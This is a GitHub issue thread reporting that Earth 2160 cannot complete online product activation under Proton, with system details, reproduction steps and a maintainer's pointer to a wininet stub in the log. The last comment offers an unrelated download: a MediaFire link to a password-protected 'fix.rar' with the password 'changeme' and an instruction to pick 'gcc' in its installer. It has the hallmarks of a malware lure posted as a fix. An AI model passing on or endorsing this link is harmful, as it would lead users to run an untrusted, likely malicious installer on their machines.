### ISSUE TITLE
Earth 2160 (1900)

### ISSUE THREAD

**Issue by KuczaRacza** [ValveSoftware/Proton#8027]
# Compatibility Report
- Earth2160
- Steam AppID: 1900

## System Information
- GPU: AMD Radeon RX 7800 XT 
- Video driver version: mesa 24.1.6-1
- Kernel version: 6.10.6-arch1-1
- Link to full system information report as [Gist](https://gist.github.com/KuczaRacza/90c8fd992be069f5742533fd33973a87):
- Proton version: Proton experimental BuildID 15306265

## I confirm:
- [x] that I haven't found an existing compatibility report for this game.
- [x] that I have checked whether there are updates for my system available.

## Symptoms 
App can't connect to internet. It prevents from restringing product blocking gameplay. No crash or  freeze.
[steam-1900.log](https://github.com/user-attachments/files/16754499/steam-1900.log)

## Reproduction
- Launch game
- Try to register after providing cd keys
- Click activate via internet
- Fill form with any data
- Connection failed (issue)

**Comment by kisak-valve** [comment]
Hello @KuczaRacza, `fixme:wininet:InternetAttemptConnect Stub` looks like a possible line of interest in your log.

**Comment by KuczaRacza** [comment]
Yes, it logs exactly as i click activate unfortunately i cant find any information about this log

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
